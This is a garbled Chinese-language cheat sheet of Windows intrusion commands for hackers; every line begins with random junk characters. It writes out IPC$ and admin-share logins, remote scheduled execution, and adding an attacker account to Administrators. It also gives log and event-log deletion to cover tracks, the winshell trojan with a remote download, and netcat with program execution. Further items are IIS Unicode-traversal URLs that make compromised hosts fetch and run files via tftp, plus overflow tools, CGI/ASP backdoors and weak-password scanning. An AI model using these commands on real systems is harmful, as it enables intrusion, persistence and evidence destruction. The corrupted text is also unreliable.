网管和黑客都必须知道的命令
�_ w/_�(k� 常用的几条NET命令:
\�.o=i�cOx �^w.]Hd��2 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�w&%�9��IJ s�a*g���� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
z<!O!wX_aI >Iu�zk1�'S (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
{@3z\wM�K$ vd`O aM}#U (查看远程主机时间) net time \\IP地址
��h\(B#SN 6
E�w@�L<v (定时启动某个程序) at \\IP地址 02:18 readme.exe
RT�,�:�h�H a�"x}b���� (查看共享) net view \\IP地址
�GWhE�8EDT ?=<��~^�Lk (查看netbios工作组列表) nbtstat -A IP地址
Jn�Y$fs*" D&/I1=�\(� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
p��!�_�[qs \wYc1M@7V� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�qe<Hfp/�p "Ht���'{�& net localgroup Administrators 用户名 /add
iox�b�f6�{ 3A�_G=WaED (断开连接) net use \\IP地址\ipc$ /delete
\^j�jK,�OK ?-��f,8Z|h 扫尾:
/,!�<�Va;~ *�r��;xw�� del C:\winnt\system32\logfiles\*.*
Vz�{>c�Sz# GF*�>~_Y�r del C:\winnt\ssytem32\config\*.evt
�@�o6�R[5( {?�Od{d�9� del C:\winnt\system32\dtclog\*.*
pr_>�b�`p6 9YD��\~v;x del C:\winnt\system32\*.log
sf$o(^P9\A #AShbl jm+ del C:\winnt\system32\*.txt
�\��Wr,�<Y 'S*k_v�uN� del C:\winnt\*.txt
wjrG7*_Y4v �(-,>�qMQs del C:\winnt\*.log
�D��SvmVI� Lkn4<�'un� 一、netsvc.exe
��-jB3L�:� z8E1���m" 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
$#e��1SS32 ��8#w)X�/� netsvc /list \\IP地址
7b�,��(\Fm &d�r@6-xaq netsvc schedule \\IP地址 /query
i)M�E�K#{� �le8 �#Z}p netsvc \\IP地址 schedule /start
�2Q@Y^�t
� y�\D=Z
�N@ 二、OpenTelnet.exe
�0�m�Tr-`s xR?V,uV'$& 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�]n;1x��1' �&l�� m��# OpenTelnet \\IP地址 用户名 密码 1 7878
)"|��||\Iv |0�g�{"}�% 然后就可以telnet到主机的7878端口,进入DOS方式下:
2}vN��SQvG MG�{l~|\x) telnet IP地址 7878
I-�DXb
M� -R
���b{^/ 三、winshell.exe
_�[�t8rl�� �eVJ^\�z:4 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
@��}&_Dv�f ml0*1�D�w� p Path (查看winshell主程序的路径信息)
�?IF)�+]�� d��u_4eB� b reBoot (重新启动机器)
G6�9Go��T� >P=Q �#;v� d shutDown (关闭机器)
rzUlO5?R�= �a�Jz�LrX� s Shell (执行后你就会看到可爱的“C:\>”)
cE\>f�8 �I -DjJ",h( $ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�mV)�+qX�C p�r&=n;_ n CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
]�Y`��Ib0$ ]JX�KZV8$0 四、3389登陆器,GUI方式登录远程主机的
__Nv0�Ru� 69�OF�_/23 五、elsave.exe
�E�=��$p^s 2��YlH}fnH 事件日志清除工具
�j.%K_h?V5 S\=1_�LDx" elsave -s \\IP地址 -l "application" -C
-1�u9t4+`� oyvK�a���g elsave -s \\IP地址 -l "system" -C
n}?wV�fE�y G�h�\�q^?} elsave -s \\IP地址 -l "security" -C
GpI�!J}~m� KC#/Z2A|<� 执行后成功清除应用程序日志,系统日志,安全日志
��c{Ou^.yR WQ6"�0*er� 六、hbulot.exe
�!�)pdamdA �O9"/�
kmB 开启win2kserver和winxp的3389服务
U���z
dc� aG%,�cQ��1 hbulot [/r]
'e!J0���6� J�Sr$-C
fH 使用/r表示安装完成后自动重起目标使设置生效。
Qdf=�X�G5 mJ}opy!{;� 七、nc.exe(netcat.exe)
=�1��.9/hW ._PzYE|m2� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�~}"]&%Q{J Wl-��<HR!n 想要连接到某处: nc [-options] hostname port[s] [ports] ...
!�EI��jN
1�P�(&J��� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
U;q];e:,=} SF[FmN!^�^ 参数:
t#i,1aHA� �O�I}cs2�m -e prog 程序重定向,一旦连接,就执行 [危险!!]
&(N�+.T5cp )B$;Vs]�@i -g gateway source-routing hop point[s], up to 8
=
i�ea�g7! �>e,mg8u6$ -G num source-routing pointer: 4, 8, 12, ...
$I�9�qgDJ) 0#*Lw }qi� -h 帮助信息
�c�>�"c�X& �ZJ*g))�k7 -i secs 延时的间隔
'#/G,%m<!i kg�i>��}
% -l 监听模式,用于入站连接
/��Q{�P3:k ;j8���)KC� -n 指定数字的IP地址,不能用hostname
m3<�+yz$!r oXXC@[??}N -o file 记录16进制的传输
2*iIj�w�3g �Z\}�K{# � -p port 本地端口号
����T~_/Vi Av'��G�B�� -r 任意指定本地及远程端口
C�����Qh,~ G 2!�xP�Hz -s addr 本地源地址
f�w�6�UhG ^�=�
�0m-/ -u UDP模式
]X Z-o>+�, `;l�.MZL�! -v 详细输出——用两个-v可得到更详细的内容
�.iX# A<E} �?>"Yr,b�? -w secs timeout的时间
��XolZonJr �\p{5�D`HY -z 将输入输出关掉——用于扫描时
e]=lKxFh&l 八、TFTPD32.EXE
a�^����d8I qM�t+�+*Ls 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
R:Q0=PzDi# YH&bD16c�3 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
DwHF[]v'�� ���,��Uh�b 然后可以直接令文件运行:
>9e(.6&2XZ 5�NoI�~X= http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
��A�+�J*e� _B��dE<
!r 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
kHw_ �S-�� Bw%Qbs0�Q� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
+5�V��L�w� QTX�8
�L 一、一 Xscan命令行运行参数说明:
^�s�N (��� U�8qtwA9t� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
LI�2&&�Mw ivDGZI�9�� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
M])dJ��9&e ;��{h�� CF xscan -file <主机列表文件名> <检测项目> [其他选项]
]I3!�fEAWR ,C%eBna4Iq 其中<检测项目> 含义如下:
�<S?�ddp�2 < -W�*$?^ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�MUfG�?r\t �+)o}c"�P! -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
`\�H�f]b� EF3Cd�u{]P -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
$/!{�OU.t` H"ZZ.^"5FV -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
5���p.rwNE 7qTE(�'zt� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
"B�����X�! E�dZ\1'&/9 [其他选项] 含义如下:
gUyR_5q)8l �.��`>y@p! -v: 显示详细扫描进度
[�q !�T�Iq �E4���m�` -p: 跳过Ping不通的主机
,|&��9�M^ (��=�~&+�z -o: 跳过没有检测到开放端口的主机
K2%w0ohC�� ,^�#yo6- -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
